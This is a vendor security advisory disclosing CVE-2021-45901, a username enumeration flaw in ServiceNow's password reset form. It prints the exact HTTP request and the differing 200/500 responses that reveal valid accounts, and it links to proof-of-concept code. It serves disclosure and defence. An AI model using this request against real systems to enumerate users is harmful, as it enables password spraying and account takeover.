During a recent engagement Trustwave SpiderLabs discovered a vulnerability (CVE-2021-45901) within ServiceNow (Orlando) which allows for a successful username enumeration by using a wordlist. By using an unauthenticated session and navigating to the password reset form, it is possible to infer a valid username. This is achieved through examination of the HTTP POST response data initially triggered by the password reset web form. This response differs depending on a username's existence.

This type of vulnerability can be used to chain together further attacks, such as password spray attacks, using known valid usernames.

ServiceNow is a highly utilized productivity management platform and in many cases is accessible via public domains. ServiceNow has patched this issue and recommends users update to ServiceNow (Rome) or later.

Example

The following illustrates the observable discrepancies within the HTTP Response POST Data which is used to infer a valid vs non-valid username. The section to pay attention to is the 'xml answer' value, where in a valid response the value will be 200 and an invalid response the value will be 500.

HTTP Request

POST /$pwd_reset.do?sysparm_url=ss_default HTTP/1.1
Host: <IP>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0

[--- some fields cut for clarity ---]

sysparm_processor=PwdAjaxVerifyIdentity&sysparm_scope=global&sysparm_want_session_messages=true&sysparm_name=verifyIdentity&sysparm_process_id=<redacted>&sysparm_processor_id_0=<redacted>&sysparm_user_id_0=admin&sysparm_identification_number=1&sysparm_pwd_csrf_token=<redacted>&ni.nolog.x_referer=ignore&x_referer=%24pwd_reset.do%3Fsysparm_url%3Dss_default

HTTP Response for a Valid Username

HTTP/1.1 200 OK
Set-Cookie: glide_user=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/; HttpOnly
Set-Cookie: glide_user_session=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/; HttpOnly
X-Is-Logged-In: false

[--- some fields cut for clarity ---]

<?xml version="1.0" encoding="UTF-8"?>
   <xml answer="200" sysparm_max="15" sysparm_name="verifyIdentity" sysparm_processor="PwdAjaxVerifyIdentity">
   <security message="" pwd_csrf_token="<redacted>" status="ok"/>
</xml>

HTTP Response for a Invalid Username

HTTP/1.1 200 OK
Set-Cookie: glide_user=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/; HttpOnly
Set-Cookie: glide_user_session=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/; HttpOnly
X-Is-Logged-In: false

[--- some fields cut for clarity ---]

<?xml version="1.0" encoding="UTF-8"?>
   <xml answer="500" sysparm_max="15" sysparm_name="verifyIdentity" sysparm_processor="PwdAjaxVerifyIdentity">
   <security message="" pwd_csrf_token="<redacted>" status="ok"/>
</xml>

As a part of Trustwave’s Responsible Disclosure Policy, we reached out to the vendor to ensure that a patch was released prior to public disclosure. The vendor's recommendation is to upgrade to Servicenow (Rome) which utilizes a simple captcha to assist in guarding against the vulnerability.

The following illustrates the custom script Trustwave SpiderLabs used to showcase the vulnerability against a susceptible endpoint.

POC code: https://github.com/9lyph/CVE-2021-45901